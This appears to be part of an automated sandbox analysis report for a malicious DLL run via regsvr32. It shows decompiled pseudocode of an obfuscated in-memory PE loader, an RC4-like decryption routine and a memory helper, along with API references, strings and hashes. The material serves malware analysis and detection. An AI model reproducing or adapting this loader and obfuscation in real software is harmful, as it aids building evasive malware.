						if(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff) == 0) {
							L15:
							_t193 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							 *0x10046a40(); // executed
							_t198 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t202 = E10001DE9(_t198 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v60 + 0x50)));
							 *_t448 = 0x22b9;
							_v52 = _t202 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", _t448 + 0x28 + _t193 *  *0x100440d8 * 0x24) *  *0x100440d8;
							_t205 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							if(_v52 != E10001DE9(_t205 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v48)) {
								goto L1;
							}
							_t210 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t210 *  *0x100440d4 + 0x2000;
							_t223 = _a8(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x34)), _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
							_t449 =  &(_t448[5]);
							_v56 = _t223;
							if(_t223 != 0) {
								L18:
								_t224 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_t227 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_v44 = HeapAlloc(GetProcessHeap(), _t227 *  *0x100440dc + 8, _t224 *  *0x100440d0 + 0x40);
								_t234 = _v44 + (GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6);
								_v64 = _t234;
								if(_t234 != 0) {
									 *((intOrPtr*)(_t234 + 4)) = _v56;
									_t235 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t238 = _v64;
									asm("sbb ecx, ecx");
									 *(_t238 + 0x14) =  ~( ~(_t235 *  *0x100440dc + 0x00002000 &  *(_v60 + 0x16) & 0x0000ffff));
									 *((intOrPtr*)(_t238 + 0x1c)) = _a8;
									 *((intOrPtr*)(_t238 + 0x20)) = _a12;
									 *((intOrPtr*)(_t238 + 0x24)) = _a16;
									 *((intOrPtr*)(_t238 + 0x28)) = _a20;
									 *((intOrPtr*)(_t238 + 0x2c)) = _a24;
									 *((intOrPtr*)(_t238 + 0x34)) = _a28;
									 *((intOrPtr*)(_v64 + 0x3c)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _v36;
									_t242 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E20(_a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _t242 *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54))) == 0) {
										L28:
										E10003567(_v64);
										goto L1;
									}
									_v48 = _a8(_v56, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54)), GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
									memcpy(_v48, _v0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x54)));
									_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 0xf8;
									 *_v64 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _v44 + _v48 +  *((intOrPtr*)(_v0 + 0x3c));
									 *((intOrPtr*)( *_v64 + 0x34)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v56;
									_t275 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E51(_v0, _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _v60, (_t275 *  *0x100440d0 << 6) + _v64) == 0) {
										goto L28;
									}
									_t283 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t407 = _v64;
									_t286 = _t283 *  *0x100440cc +  *((intOrPtr*)( *_t407 + 0x34)) -  *((intOrPtr*)(_v60 + 0x34));
									_a4 = _t286;
									if(_t286 == 0) {
										 *((intOrPtr*)(_t407 + 0x18)) = 1;
									} else {
										_t308 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
										_a4 = E1000290C((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64, _a4 + _t308 *  *0x100440d8);
										 *((intOrPtr*)(_v64 + 0x18)) = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0;
									}
									if(E10002BDE((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0 || E10002482((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64) == 0 || E10002863((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0) {
										goto L28;
									} else {
										_t302 = _v64;
										if( *((intOrPtr*)( *_t302 + 0x28)) == 0) {
											 *((intOrPtr*)(_t302 + 0x38)) = 0;
											return _t302;
										}
										_push(0x22b9);
										_push(L"xadqsavcbdfewescGADW");
										_push(0);
										_push(_t447);
										_push(0x11d4);
										_push(0);
										if( *((intOrPtr*)(_t302 + 0x14)) == 0) {
											 *((intOrPtr*)(_v64 + 0x38)) = GetCurrencyFormatW() *  *0x100440d0 +  *((intOrPtr*)( *_v64 + 0x28)) + _v56;
										} else {
											_t306 = GetCurrencyFormatW();
											_t307 = _v64;
											 *0x10046a88 = _t306 *  *0x100440d0 +  *((intOrPtr*)( *_t307 + 0x28)) + _v56;
											 *((intOrPtr*)(_t307 + 0x10)) = 1;
										}
										return _v64;
									}
								}
								_a12(_v56, 0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x8000, _a28);
								goto L1;
							}
							_t323 = GetCurrencyFormatW(_t223, 0x11d4, _t447, _t223, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t323 *  *0x100440d0 + 0x2000;
							_t336 = _a8(0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 4, _a28);
							_t449 =  &(_t449[5]);
							_v56 = _t336;
							if(_t336 == 0) {
								goto L1;
							}
							goto L18;
						}
						_v52 = _v52 + 0xc;
						do {
							_push(0x22b9);
							_push(L"xadqsavcbdfewescGADW");
							_push(0);
							_push(_t447);
							_push(0x11d4);
							_push(0);
							if( *((intOrPtr*)(_v52 + 4)) != 0) {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 +  *((intOrPtr*)(_v52 + 4));
							} else {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 + _v40;
							}
							_v60 = _t343;
							if(_v60 > GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v44) {
								_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc + _v60;
							}
							_v48 = _v48 + 1;
							_v52 = _v52 + 0x28;
						} while (_v48 < GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff));
						goto L15;
					}
				}
				L1:
				return 0;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100039D5
GetCurrencyFormatW.KERNEL32 ref: 100039EE

Part of subcall function 10001E20: GetCurrencyFormatW.KERNEL32 ref: 10001E38

GetCurrencyFormatW.KERNEL32 ref: 10003A1A
GetCurrencyFormatW.KERNEL32 ref: 10003A3F
GetCurrencyFormatW.KERNEL32 ref: 10003A63
GetCurrencyFormatW.KERNEL32 ref: 10003A88
GetCurrencyFormatW.KERNEL32 ref: 10003AAA
GetCurrencyFormatW.KERNEL32 ref: 10003AD0
GetCurrencyFormatW.KERNEL32 ref: 10003AFA
GetCurrencyFormatW.KERNEL32 ref: 10003B1D

Strings

xadqsavcbdfewescGADW, xrefs: 100039BC, 100039E3, 10003A0F, 10003A34, 10003A58, 10003A7D, 10003A96, 10003AC5, 10003AEF, 10003B12, 10003B39, 10003B7D, 10003BB5, 10003BD8, 10003BFE, 10003C27, 10003C4A, 10003C69, 10003C91, 10003CAC, 10003CD1, 10003D00, 10003D1E, 10003D3B, 10003D5E, 10003D8E, 10003DAA, 10003DC7, 10003DE6, 10003E15, 10003E2E, 10003E54, 10003E82, 10003EB2, 10003EFB, 10003F30, 10003F50, 10003F7D, 10003F96, 10003FB1, 10003FD9, 1000400B, 10004026, 10004052, 10004073, 10004097, 100040C5, 100040F0, 1000410A, 1000412E, 1000415D, 10004184, 100041AB, 100041F1
(, xrefs: 10003BF8
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100039C4, 100039C9, 100039EA, 10003A16, 10003A3B, 10003A5F, 10003A84, 10003A9D, 10003ACC, 10003AF6, 10003B19, 10003B45, 10003B88, 10003BBC, 10003BDF, 10003C05, 10003C2E, 10003C51, 10003C70, 10003C98, 10003CB3, 10003CD8, 10003D07, 10003D25, 10003D42, 10003D65, 10003D94, 10003DB1, 10003DCE, 10003DED, 10003E1C, 10003E35, 10003E5B, 10003E8A, 10003EB9, 10003F10, 10003F37, 10003F57, 10003F84, 10003F9D, 10003FB8, 10003FE0, 10004012, 1000402D, 10004059, 1000407A, 1000409E, 100040CC, 100040F7, 10004111, 10004135, 10004164, 1000418B, 100041B2, 100041F7

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-2712681272
Opcode ID: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
Instruction ID: be84b0d19bb5b2932066f15e7eca2fa00d7c74bd76f66a19a1550838f82622ea
Opcode Fuzzy Hash: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
Instruction Fuzzy Hash: 06428BB1604215BFE314DB91CD82FA7BFACEB8B788F024409F705DB292D771E8548A65

Uniqueness

Uniqueness Score: -1.00%

Function 100018D8 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 194
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E100018D8(signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				intOrPtr* _v4;
				void* _v8;
				int _v12;
				void* _t78;
				signed int _t89;
				signed int _t111;
				signed int _t116;
				signed int _t117;
				signed int _t120;
				int _t129;
				short* _t159;

				_t129 = 0x22b9;
				_t159 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 = 0;
				_a8 = _a4 - _a12 + _a8;
				_t78 = malloc(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440d0 + 0x4708); // executed
				_v8 = _t78;
				_a12 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708 > 0) {
					do {
						_t116 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t117 = _a12;
						 *(_t116 * _a8 *  *0x100440d0 + _t117 + _a16) = _t117;
						_a4 = _t117 % _a24;
						_t120 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t129 = 0x22b9;
						 *((char*)(_v8 + _t120 * _a8 *  *0x100440d8 + _a12)) =  *((intOrPtr*)(_a4 + _a20));
						GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_a12 = _a12 + 1;
					} while (_a12 < GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708);
				}
				_a12 = _a12 & 0x00000000;
				do {
					_a4 =  *((char*)(_v8 + GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d4 + _a12));
					_t89 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					asm("cdq");
					_v12 = (( *(_t89 * _a8 *  *0x100440d8 + _a12 + _a16) & 0x000000ff) + _a4 + _v12) % 0x4708;
					_a4 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _a12 + _a16));
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _v12 + _a16;
					 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d0 + _a12 + _a16)) =  *_v4;
					_t111 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					_a12 = _a12 + 1;
					 *((char*)(_t111 * _a8 *  *0x100440dc + _v12 + _a16)) = _a4;
				} while (_a12 < 0x4708);
				return  *0x10046a64(_v8);
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001916
malloc.MSVCRT ref: 1000192A
GetCurrencyFormatW.KERNEL32 ref: 10001945
GetCurrencyFormatW.KERNEL32 ref: 1000196C
GetCurrencyFormatW.KERNEL32 ref: 100019A1
GetCurrencyFormatW.KERNEL32 ref: 100019D6
GetCurrencyFormatW.KERNEL32 ref: 100019E8
GetCurrencyFormatW.KERNEL32 ref: 10001A16
GetCurrencyFormatW.KERNEL32 ref: 10001A40
GetCurrencyFormatW.KERNEL32 ref: 10001A7A
GetCurrencyFormatW.KERNEL32 ref: 10001AA3
GetCurrencyFormatW.KERNEL32 ref: 10001AC9
GetCurrencyFormatW.KERNEL32 ref: 10001AF4
??3@YAXPAX@Z.MSVCRT ref: 10001B27

Strings

xadqsavcbdfewescGADW, xrefs: 100018F7, 10001932, 10001961, 10001990, 100019C8, 100019DD, 10001A0B, 10001A31, 10001A6B, 10001A94, 10001ABA, 10001AE6
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100018FF, 10001904, 1000193E, 10001968, 10001997, 100019CF, 100019E4, 10001A12, 10001A38, 10001A72, 10001A9B, 10001AC1, 10001AED

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat$??3@malloc
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 203256951-3161301136
Opcode ID: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
Instruction ID: fba73ffc0b4bb754e4a8c3637f8b73e63a87aae8de5c3fee8d95280e19d6a203
Opcode Fuzzy Hash: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
Instruction Fuzzy Hash: 9F615A71508350AFE304DB11CD91F5BBFE9EBCA748F05590EF684AB2A1C731EA148E26

Uniqueness

Uniqueness Score: -1.00%

Function 1000227A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E1000227A(void** __ebx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t60;
				signed int _t66;
				signed int _t68;
				int _t74;
				void** _t84;
				short* _t103;
				void* _t119;

				_t84 = __ebx;
				if(__ebx[2] != 0) {
					_t106 = 0x22b9;
					if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
						_t47 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb esi, esi");
						_t48 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb edi, edi");
						_t49 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb eax, eax");
						_t103 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						_v8 =  *((intOrPtr*)(0x10046a90 + ( ~( ~(_t49 *  *0x100440e0 - 0x80000000 & __ebx[3])) + ( ~( ~(_t48 *  *0x100440e0 + 0x40000000 & __ebx[3])) +  ~( ~(_t47 *  *0x100440d4 + 0x20000000 & __ebx[3])) * 2) * 2) * 4));
						if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x04000000) != 0) {
							_v8 = _v8 | GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000200;
						}
						_t60 = GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t66 = VirtualProtect( *_t84, _t84[2] + GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0, _v8, _t119 + 0x10 + _t60 *  *0x100440d8 * 4); // executed
						asm("sbb eax, eax");
						_t68 =  ~( ~_t66);
						L13:
						return _t68;
					}
					if( *__ebx != __ebx[1]) {
						L9:
						_t68 = 1;
						goto L13;
					}
					_t74 = 0;
					if(__ebx[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L8:
						 *((intOrPtr*)(_a4 + 0x20))( *_t84, _t84[2], GetCurrencyFormatW(_t74, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", _t74, L"xadqsavcbdfewescGADW", _t106) *  *0x100440e0 + 0x4000,  *((intOrPtr*)(_a4 + 0x34)));
						goto L9;
					} else {
						if(GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + __ebx[2] %  *(_a4 + 0x3c) != 0) {
							goto L9;
						}
						_t106 = 0x22b9;
						_t74 = 0;
						goto L8;
					}
				}
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100022AA
GetCurrencyFormatW.KERNEL32 ref: 100022EB
GetCurrencyFormatW.KERNEL32 ref: 10002322

Strings

xadqsavcbdfewescGADW, xrefs: 10002298, 100022DE, 10002315, 10002349, 10002368, 10002396, 100023D0, 10002412, 10002434, 10002456
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002289, 1000229E, 100022E4, 1000231B, 10002350, 10002378, 100023A6, 100023DE, 100023E3, 10002419, 1000243B, 1000245D

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
Instruction ID: 001e048e4435a5d91bd341ad1d3e9c5f26db428d8a62d425f6a780c80bac8da3
Opcode Fuzzy Hash: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
Instruction Fuzzy Hash: E651E1726002117FE301CB50CD86F97BBA9EB8B751F158418FB06EF191D730A864CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10010763 Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10010763() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x10048600
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x6856a0
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100010C9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100010C9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E10020F40(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x6856a0
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x100442e0;
							E100209E8( &_v28, 0x1003e1e4);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10044378;
							E100209E8( &_v36, 0x1003e298);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10044410;
							E100209E8( &_v44, 0x1003e2dc);
							asm("int3");
							_push(4);
							E1001FBC4(E10032E9B, _t69, _t82, _t86);
							_t78 = E100105C8(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000E58E(_t78);
							}
							return E1001FC9C(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x6856a0
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x6856a0
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x6856a0
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

APIs

